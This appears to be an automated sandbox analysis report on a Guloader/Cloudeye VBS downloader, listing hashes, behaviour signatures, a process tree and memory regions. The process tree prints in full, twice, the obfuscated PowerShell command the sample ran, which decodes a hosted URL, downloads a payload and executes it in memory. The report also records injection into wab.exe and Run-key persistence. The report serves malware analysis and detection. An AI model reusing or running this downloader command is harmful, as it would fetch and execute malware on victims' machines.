Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/02/2024, 05:21

General

  • Target

    29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f.vbs

  • Size

    84KB

  • MD5

    d844d1877e456c98d39c5ae4b5afa005

  • SHA1

    dd398afb0845afc4b0b180534f06950c500b73d0

  • SHA256

    29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f

  • SHA512

    43e0e3dd07b8961efd2ca64bfb09f6ac9d53322e2d2eef1e6d5503d56f18854b40b065312dc0af0053d13eabb913660f0130eeda9225659876e94e5b421c7ceb

  • SSDEEP

    1536:UO+rAQgFXLEvvR6op8MiqKkjmyJ4BXwljIW84fEeHPD:UNcQgdLEXR6Y8MiqKkjmyJyXUOKD

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Adds policy Run key to start application 2 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$rimen='Sammenvoksnings:\Selbornian';Set-Content $rimen 'Shorter';$Fencing240=Test-Path $rimen;if($Fencing240){exit};function Krybeklderes9 ($Programme){For($Gullbrith=4; $Gullbrith -lt $Programme.Length-1; $Gullbrith+=5){$Interim=$Interim+$Programme.'Substring'($Gullbrith, 1)};$Interim;}$Fleetwing=Krybeklderes9 ' L.vhSeldtSymatRep.pHalvsFl e:In e/met / eadno,crThari Tyvv trbeForm.VenegDefloLithoWe,tg Re,l roeDgnd.Sst,cMicroRedem Fr./UdliuUnidcarbe?synoeNonfxPi,ep Ka.oKratr .ritaltm= RemdF rto NeowBj gnInddlSacro ChiaPudrdHayf&P,pii Zamd L g=.use1WinkOBi.kxWaivX NyhaLopePSpeeJGalaK FulEKrokI,nadY.mmuGBibeAballTFred_TocaXsaniV Da 5Ae,o4 Ka,tc psTAfruZO,err UniJFlosOagtiIfictj nti1 mioc keM Fl,xS,nerEm,tF Umb ';$Interim01=Krybeklderes9 ' ufoiProkeTro.xA dr ';$Traeskaftet = Krybeklderes9 'Samo\ atas anty RafsD ngwValgoStynwRyt.6 ga 4Gl.n\HerlWMultiArbanEum dRedioMicrwRedes AtmPPoetoM llwFrede Lokr Bo,SBrndhEtymeMasklVan,l,yca\Cuvev Pre1Otot.Post0Subw\ ,arpSideo J,gw tttePro.rTvils uzzhPa,aeKynilM.irlSu.p. teteSekox Af eKli ';&($Interim01) (Krybeklderes9 ' rad$sammS.ekaaKlagmat.amMalaePrednN mavspegoDiakkS atsFlyvnAbonis,ornTreeg Ar,sser.2Equ,= hil$KvareDip,n .emvRa,t:Fo,twPhani.gginBo edBegyiTinsr.nst ') ;&($Interim01) (Krybeklderes9 ' C.g$BrunTSo,irSvigaForsemyonsOffikApria Witf aatA oke Opvt Sub=I om$AlteSInfiaMo.emEkspmL,tteRenonC llvTranononekS.itsAmtsn.leaiFlotnFlusgInt s int2Maa,+Nonf$andeT V,tr asaNyste rgtsLit.kPothaSw,efHematScr.eForetinvi ') ;&($Interim01) (Krybeklderes9 'Bulk$DykiNFuldeUncodKvotsFer.kpas.rQu si MenvB.klnHeiniCyton s,agebonsNudnt Veri,rucdUndisForsp HimuHvaln Petk luttMundeurkrrLivsnam,reroma Ata=Sydk Ledv(Ska ( steg etewDecamForsiBety Be wTr,eiIselnOver3U so2 ne_P.eupNonar AltoBrolcRinge,olysEighsHove Gert- Ex Fx,lo C,enPTmrerChibo St.cbynaeAntosDyb.sforbIDiesdden,= Men$Subm{PeriPmyelIHaraD mpl} Exp) Ga..BoniCRelao GudmB xbm ,piaLi yn Un dSearLNatti nstn ebuecont)Pseu Rekv-In.isHomrpRhetlKeroiSo.it ent Mdd.[OdyscOprih AeraAdrerFond]Diab3 Dev4 z,n ');&($Interim01) (Krybeklderes9 'Daem$.aktBca eeSkilcLe.luC nsmBagkb,ldeeCen,rLipo Jog=Unbo Fort$.nanNRo.meSymad JersFissk GodrGeniiAfbrv UdfnPanti StrnEndegRocksTweatAmaliOutwdRetssHu,tp anguRevenInd kCruet areR inrJo.dnPseue Hor[Mikk$ConcNrulleUndadI.disAr okPseurMicriHeptvVi,enKoleiNed.nThrig hesHabetDevoi tild,ryss ubop TriuAlsbnForhkSemitPreaeKat,rSolbn.olleGele. MincSunro,yanuSundn FectFore-vulv2Ph.e] Gen ');&($Interim01) (Krybeklderes9 'Bran$VojeSTematCreoeSapoeSlvbpFangyLrke=Scia(MaduTSo re UndsRa,atInde-,iemPSublaHakktPendhPyro ,erd$KultT DevrHyp.aHjlye AnasEkstk MinaDepofSilktZ ptenon tNats)F nd Li.k-M,seAPretnEkspdForp Fre(etr.[R,nsIAustnSemitSkalPSynatEfterEksa]ambu:Cran: Taes.riniStorz OffeAch Sp.l-PlyseFrstqSkum G.ns8Nonp)C ll ') ;if ($Steepy) {&$Traeskaftet $Becumber;} else {;$Interim00=Krybeklderes9 ' .ftS Ch.tTrilaTh,crWhictY.si- PreB smaiInsetTyp.sEfteTInterTinnaLeatnBlodsHumaf ReveNonqrAmin Blo.- DioSBaseoTagdu TyprKartcMemoeA at B,nd$UdmnF S.dlvibre UnheBryst RegwO.tpiT ennRiddgTapi Sake-TandDRumpeabios.ntetC upiOctonKameaGlaut TidiSvu.oInnunWhis ham$CrosSrhagaServmfilhm.tjgeDedin Kanv.anho SepkFrossDescnSmmoiWal n ,scgDragsRot.2 Su. ';&($Interim01) (Krybeklderes9 'Befu$RestSForkaUdmrmPerjmProceSe.vn Rouvkra.opravkApo.s .nanSouti,urrn astgProts Cho2ti i=Fore$ EsceTsetnLne.vFo,l:unreaTannp DrupskridFiniaSt,tt.orja.nte ') ;&($Interim01) (Krybeklderes9 'ObseIUmbrm.dlepProdoBrumrDinntFlig- IndMhaano Cysd IntuSynglRoutemask SeruB RepiAkkut outsLit TAbstrEkstaOmstnCarysHjrefcytoeCarorChon ') ;$Sammenvoksnings2=$Sammenvoksnings2+'\Inadmissibly.Bet';while (-not $Forelskelsen) {&($Interim01) (Krybeklderes9 ' Pro$ TeoFSvrmo N,nrHaugeHexal uszsK.rtkBje eStralHypes Aute GeinUk.i=Pseu(Kre.TF.rde ars BiltBord-PrepP ,icaTekstTou.h.ini Sht.$ThraSMarga Gi mTra,m ,paePerinKursv,vejo.egrkCabbsCrabnJewsiFunknAnatg mansFlop2 Sob) aar ') ;&($Interim01) $Interim00;&($Interim01) (Krybeklderes9 'RuneSAcertHveraDrmmr .kstNond-RoseSRefllRemoeNaaleA,bepKont Sp,o5Thra ');}&($Interim01) (Krybeklderes9 ',luf$ ModK ngarpriny SvbbFyrteStolkKapllTetrdEupheProrrRelaeCo,tsF.jl Tho =Aer, troGPh.seindktlong-Me,iCAvocoOrmunFi.mt TileThe nAfhatVint Hu,z$,illSSortaHackm ,nomw,maeSkivnNewsv.reno AtekHaussShaknDataiApekn NicgTrans Dej2 I,o ');&($Interim01) (Krybeklderes9 'Invi$DberCBardohentbastobNa eiPecteReto Tol =Info ust[ In SSir ySkatsB.ugtPhobeKr,smAnti. R,sCPainoSpilnBjervGrateIndkrSkritlama],rog:M,si:ClinFgynar GuioS,pumDrgtBForda ,lisKa de ,fp6 Lde4S,faSMtaat ,ror C,oiD,bsn kasg,uar(Forp$ddebKGynkr DelyPaupb oceeHedvk addl padWauke Le,rEbereBehesgarv) Ber ');&($Interim01) (Krybeklderes9 'gymn$AppeIsa.knIn.rtJasue E.srTaariRe nmDra 2F.nd Sate=Horm Hemi[M,crSSt,nyAnhos RhetStu eKog.mfell.Fer,TLammeA,gix .avtOver.FiskE MeenEnv.cFanaogeocdBazei erznK ffgSubc]Arti:Have:Ad.iASmaaSTrevC,oveI,vejIcere.PodoGSpeceStuet resSs,rptLamir latiSla nS argL,ke( Hit$P ukCDisvo SlabRonkbS,eciPecueFlan)Undi ');&($Interim01) (Krybeklderes9 ' U t$photSRo,aaMal,mGa tmFal,eStannGrifsFondt TsuuFi,kv Byge.ricrA.ma= Di,$OpfoIHalfn diltCeliegrmmrCivii NabmInco2 nae.StersAirlumultb albsoza,t subrKulti.oiln MacgTr,l(Afsl3 Pus1Suc 8Aske4 Var3Stir5Bard,Boer3Trbe7Retr7Heav1Spa.9Weat)F.ak ');&($Interim01) $Sammenstuver;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$rimen='Sammenvoksnings:\Selbornian';Set-Content $rimen 'Shorter';$Fencing240=Test-Path $rimen;if($Fencing240){exit};function Krybeklderes9 ($Programme){For($Gullbrith=4; $Gullbrith -lt $Programme.Length-1; $Gullbrith+=5){$Interim=$Interim+$Programme.'Substring'($Gullbrith, 1)};$Interim;}$Fleetwing=Krybeklderes9 ' L.vhSeldtSymatRep.pHalvsFl e:In e/met / eadno,crThari Tyvv trbeForm.VenegDefloLithoWe,tg Re,l roeDgnd.Sst,cMicroRedem Fr./UdliuUnidcarbe?synoeNonfxPi,ep Ka.oKratr .ritaltm= RemdF rto NeowBj gnInddlSacro ChiaPudrdHayf&P,pii Zamd L g=.use1WinkOBi.kxWaivX NyhaLopePSpeeJGalaK FulEKrokI,nadY.mmuGBibeAballTFred_TocaXsaniV Da 5Ae,o4 Ka,tc psTAfruZO,err UniJFlosOagtiIfictj nti1 mioc keM Fl,xS,nerEm,tF Umb ';$Interim01=Krybeklderes9 ' ufoiProkeTro.xA dr ';$Traeskaftet = Krybeklderes9 'Samo\ atas anty RafsD ngwValgoStynwRyt.6 ga 4Gl.n\HerlWMultiArbanEum dRedioMicrwRedes AtmPPoetoM llwFrede Lokr Bo,SBrndhEtymeMasklVan,l,yca\Cuvev Pre1Otot.Post0Subw\ ,arpSideo J,gw tttePro.rTvils uzzhPa,aeKynilM.irlSu.p. teteSekox Af eKli ';&($Interim01) (Krybeklderes9 ' rad$sammS.ekaaKlagmat.amMalaePrednN mavspegoDiakkS atsFlyvnAbonis,ornTreeg Ar,sser.2Equ,= hil$KvareDip,n .emvRa,t:Fo,twPhani.gginBo edBegyiTinsr.nst ') ;&($Interim01) (Krybeklderes9 ' C.g$BrunTSo,irSvigaForsemyonsOffikApria Witf aatA oke Opvt Sub=I om$AlteSInfiaMo.emEkspmL,tteRenonC llvTranononekS.itsAmtsn.leaiFlotnFlusgInt s int2Maa,+Nonf$andeT V,tr asaNyste rgtsLit.kPothaSw,efHematScr.eForetinvi ') ;&($Interim01) (Krybeklderes9 'Bulk$DykiNFuldeUncodKvotsFer.kpas.rQu si MenvB.klnHeiniCyton s,agebonsNudnt Veri,rucdUndisForsp HimuHvaln Petk luttMundeurkrrLivsnam,reroma Ata=Sydk Ledv(Ska ( steg etewDecamForsiBety Be wTr,eiIselnOver3U so2 ne_P.eupNonar AltoBrolcRinge,olysEighsHove Gert- Ex Fx,lo C,enPTmrerChibo St.cbynaeAntosDyb.sforbIDiesdden,= Men$Subm{PeriPmyelIHaraD mpl} Exp) Ga..BoniCRelao GudmB xbm ,piaLi yn Un dSearLNatti nstn ebuecont)Pseu Rekv-In.isHomrpRhetlKeroiSo.it ent Mdd.[OdyscOprih AeraAdrerFond]Diab3 Dev4 z,n ');&($Interim01) (Krybeklderes9 'Daem$.aktBca eeSkilcLe.luC nsmBagkb,ldeeCen,rLipo Jog=Unbo Fort$.nanNRo.meSymad JersFissk GodrGeniiAfbrv UdfnPanti StrnEndegRocksTweatAmaliOutwdRetssHu,tp anguRevenInd kCruet areR inrJo.dnPseue Hor[Mikk$ConcNrulleUndadI.disAr okPseurMicriHeptvVi,enKoleiNed.nThrig hesHabetDevoi tild,ryss ubop TriuAlsbnForhkSemitPreaeKat,rSolbn.olleGele. MincSunro,yanuSundn FectFore-vulv2Ph.e] Gen ');&($Interim01) (Krybeklderes9 'Bran$VojeSTematCreoeSapoeSlvbpFangyLrke=Scia(MaduTSo re UndsRa,atInde-,iemPSublaHakktPendhPyro ,erd$KultT DevrHyp.aHjlye AnasEkstk MinaDepofSilktZ ptenon tNats)F nd Li.k-M,seAPretnEkspdForp Fre(etr.[R,nsIAustnSemitSkalPSynatEfterEksa]ambu:Cran: Taes.riniStorz OffeAch Sp.l-PlyseFrstqSkum G.ns8Nonp)C ll ') ;if ($Steepy) {&$Traeskaftet $Becumber;} else {;$Interim00=Krybeklderes9 ' .ftS Ch.tTrilaTh,crWhictY.si- PreB smaiInsetTyp.sEfteTInterTinnaLeatnBlodsHumaf ReveNonqrAmin Blo.- DioSBaseoTagdu TyprKartcMemoeA at B,nd$UdmnF S.dlvibre UnheBryst RegwO.tpiT ennRiddgTapi Sake-TandDRumpeabios.ntetC upiOctonKameaGlaut TidiSvu.oInnunWhis ham$CrosSrhagaServmfilhm.tjgeDedin Kanv.anho SepkFrossDescnSmmoiWal n ,scgDragsRot.2 Su. ';&($Interim01) (Krybeklderes9 'Befu$RestSForkaUdmrmPerjmProceSe.vn Rouvkra.opravkApo.s .nanSouti,urrn astgProts Cho2ti i=Fore$ EsceTsetnLne.vFo,l:unreaTannp DrupskridFiniaSt,tt.orja.nte ') ;&($Interim01) (Krybeklderes9 'ObseIUmbrm.dlepProdoBrumrDinntFlig- IndMhaano Cysd IntuSynglRoutemask SeruB RepiAkkut outsLit TAbstrEkstaOmstnCarysHjrefcytoeCarorChon ') ;$Sammenvoksnings2=$Sammenvoksnings2+'\Inadmissibly.Bet';while (-not $Forelskelsen) {&($Interim01) (Krybeklderes9 ' Pro$ TeoFSvrmo N,nrHaugeHexal uszsK.rtkBje eStralHypes Aute GeinUk.i=Pseu(Kre.TF.rde ars BiltBord-PrepP ,icaTekstTou.h.ini Sht.$ThraSMarga Gi mTra,m ,paePerinKursv,vejo.egrkCabbsCrabnJewsiFunknAnatg mansFlop2 Sob) aar ') ;&($Interim01) $Interim00;&($Interim01) (Krybeklderes9 'RuneSAcertHveraDrmmr .kstNond-RoseSRefllRemoeNaaleA,bepKont Sp,o5Thra ');}&($Interim01) (Krybeklderes9 ',luf$ ModK ngarpriny SvbbFyrteStolkKapllTetrdEupheProrrRelaeCo,tsF.jl Tho =Aer, troGPh.seindktlong-Me,iCAvocoOrmunFi.mt TileThe nAfhatVint Hu,z$,illSSortaHackm ,nomw,maeSkivnNewsv.reno AtekHaussShaknDataiApekn NicgTrans Dej2 I,o ');&($Interim01) (Krybeklderes9 'Invi$DberCBardohentbastobNa eiPecteReto Tol =Info ust[ In SSir ySkatsB.ugtPhobeKr,smAnti. R,sCPainoSpilnBjervGrateIndkrSkritlama],rog:M,si:ClinFgynar GuioS,pumDrgtBForda ,lisKa de ,fp6 Lde4S,faSMtaat ,ror C,oiD,bsn kasg,uar(Forp$ddebKGynkr DelyPaupb oceeHedvk addl padWauke Le,rEbereBehesgarv) Ber ');&($Interim01) (Krybeklderes9 'gymn$AppeIsa.knIn.rtJasue E.srTaariRe nmDra 2F.nd Sate=Horm Hemi[M,crSSt,nyAnhos RhetStu eKog.mfell.Fer,TLammeA,gix .avtOver.FiskE MeenEnv.cFanaogeocdBazei erznK ffgSubc]Arti:Have:Ad.iASmaaSTrevC,oveI,vejIcere.PodoGSpeceStuet resSs,rptLamir latiSla nS argL,ke( Hit$P ukCDisvo SlabRonkbS,eciPecueFlan)Undi ');&($Interim01) (Krybeklderes9 ' U t$photSRo,aaMal,mGa tmFal,eStannGrifsFondt TsuuFi,kv Byge.ricrA.ma= Di,$OpfoIHalfn diltCeliegrmmrCivii NabmInco2 nae.StersAirlumultb albsoza,t subrKulti.oiln MacgTr,l(Afsl3 Pus1Suc 8Aske4 Var3Stir5Bard,Boer3Trbe7Retr7Heav1Spa.9Weat)F.ak ');&($Interim01) $Sammenstuver;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4448
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          PID:2204
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3512
    • C:\Windows\SysWOW64\DevicePairingWizard.exe
      "C:\Windows\SysWOW64\DevicePairingWizard.exe"
      2⤵
      • Adds policy Run key to start application
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
          PID:3692

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4h50zye.mi3.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2204-72-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/2204-55-0x0000000077D61000-0x0000000077E81000-memory.dmp

            Filesize

            1.1MB

          • memory/2204-56-0x0000000077DE8000-0x0000000077DE9000-memory.dmp

            Filesize

            4KB

          • memory/2204-69-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/2204-71-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/2204-84-0x000000001F450000-0x000000001F46E000-memory.dmp

            Filesize

            120KB

          • memory/2204-54-0x0000000000A10000-0x0000000003957000-memory.dmp

            Filesize

            47.3MB

          • memory/2204-77-0x000000001F990000-0x000000001FCDA000-memory.dmp

            Filesize

            3.3MB

          • memory/2204-78-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/2204-79-0x0000000000A10000-0x0000000003957000-memory.dmp

            Filesize

            47.3MB

          • memory/2204-88-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/2204-83-0x0000000000400000-0x00000000005E4000-memory.dmp

            Filesize

            1.9MB

          • memory/2256-40-0x00007FFD65080000-0x00007FFD65B41000-memory.dmp

            Filesize

            10.8MB

          • memory/2256-44-0x0000024D86050000-0x0000024D86060000-memory.dmp

            Filesize

            64KB

          • memory/2256-12-0x00007FFD65080000-0x00007FFD65B41000-memory.dmp

            Filesize

            10.8MB

          • memory/2256-13-0x0000024D86050000-0x0000024D86060000-memory.dmp

            Filesize

            64KB

          • memory/2256-2-0x0000024DA0770000-0x0000024DA0792000-memory.dmp

            Filesize

            136KB

          • memory/2256-76-0x00007FFD65080000-0x00007FFD65B41000-memory.dmp

            Filesize

            10.8MB

          • memory/2256-42-0x0000024D86050000-0x0000024D86060000-memory.dmp

            Filesize

            64KB

          • memory/2256-43-0x0000024D86050000-0x0000024D86060000-memory.dmp

            Filesize

            64KB

          • memory/3512-85-0x000000000CE90000-0x000000000E1D2000-memory.dmp

            Filesize

            19.3MB

          • memory/3512-94-0x00000000025C0000-0x0000000002662000-memory.dmp

            Filesize

            648KB

          • memory/3512-95-0x00000000025C0000-0x0000000002662000-memory.dmp

            Filesize

            648KB

          • memory/3512-92-0x000000000CE90000-0x000000000E1D2000-memory.dmp

            Filesize

            19.3MB

          • memory/3712-89-0x0000000002860000-0x0000000002BAA000-memory.dmp

            Filesize

            3.3MB

          • memory/3712-93-0x0000000000540000-0x0000000000580000-memory.dmp

            Filesize

            256KB

          • memory/3712-91-0x00000000025F0000-0x000000000268D000-memory.dmp

            Filesize

            628KB

          • memory/3712-90-0x0000000000540000-0x0000000000580000-memory.dmp

            Filesize

            256KB

          • memory/3712-87-0x0000000000540000-0x0000000000580000-memory.dmp

            Filesize

            256KB

          • memory/3712-86-0x0000000000540000-0x0000000000580000-memory.dmp

            Filesize

            256KB

          • memory/4448-33-0x0000000006C60000-0x0000000006CF6000-memory.dmp

            Filesize

            600KB

          • memory/4448-52-0x0000000002550000-0x0000000002560000-memory.dmp

            Filesize

            64KB

          • memory/4448-53-0x0000000077D61000-0x0000000077E81000-memory.dmp

            Filesize

            1.1MB

          • memory/4448-51-0x00000000087D0000-0x000000000B717000-memory.dmp

            Filesize

            47.3MB

          • memory/4448-50-0x0000000002550000-0x0000000002560000-memory.dmp

            Filesize

            64KB

          • memory/4448-49-0x00000000087D0000-0x000000000B717000-memory.dmp

            Filesize

            47.3MB

          • memory/4448-48-0x00000000073A0000-0x00000000073A1000-memory.dmp

            Filesize

            4KB

          • memory/4448-70-0x0000000075340000-0x0000000075AF0000-memory.dmp

            Filesize

            7.7MB

          • memory/4448-47-0x0000000002550000-0x0000000002560000-memory.dmp

            Filesize

            64KB

          • memory/4448-45-0x0000000075340000-0x0000000075AF0000-memory.dmp

            Filesize

            7.7MB

          • memory/4448-73-0x00000000087D0000-0x000000000B717000-memory.dmp

            Filesize

            47.3MB

          • memory/4448-41-0x0000000002550000-0x0000000002560000-memory.dmp

            Filesize

            64KB

          • memory/4448-39-0x0000000007330000-0x0000000007344000-memory.dmp

            Filesize

            80KB

          • memory/4448-38-0x00000000072A0000-0x00000000072C2000-memory.dmp

            Filesize

            136KB

          • memory/4448-37-0x0000000008150000-0x00000000087CA000-memory.dmp

            Filesize

            6.5MB

          • memory/4448-36-0x0000000007520000-0x0000000007AC4000-memory.dmp

            Filesize

            5.6MB

          • memory/4448-35-0x0000000006240000-0x0000000006262000-memory.dmp

            Filesize

            136KB

          • memory/4448-34-0x00000000061C0000-0x00000000061DA000-memory.dmp

            Filesize

            104KB

          • memory/4448-32-0x0000000005CF0000-0x0000000005D3C000-memory.dmp

            Filesize

            304KB

          • memory/4448-31-0x0000000005CB0000-0x0000000005CCE000-memory.dmp

            Filesize

            120KB

          • memory/4448-30-0x00000000058B0000-0x0000000005C04000-memory.dmp

            Filesize

            3.3MB

          • memory/4448-29-0x0000000005810000-0x0000000005876000-memory.dmp

            Filesize

            408KB

          • memory/4448-28-0x00000000056F0000-0x0000000005756000-memory.dmp

            Filesize

            408KB

          • memory/4448-23-0x0000000004DF0000-0x0000000004E12000-memory.dmp

            Filesize

            136KB

          • memory/4448-17-0x0000000004F00000-0x0000000005528000-memory.dmp

            Filesize

            6.2MB

          • memory/4448-16-0x0000000002550000-0x0000000002560000-memory.dmp

            Filesize

            64KB

          • memory/4448-15-0x0000000075340000-0x0000000075AF0000-memory.dmp

            Filesize

            7.7MB

          • memory/4448-14-0x00000000023B0000-0x00000000023E6000-memory.dmp

            Filesize

            216KB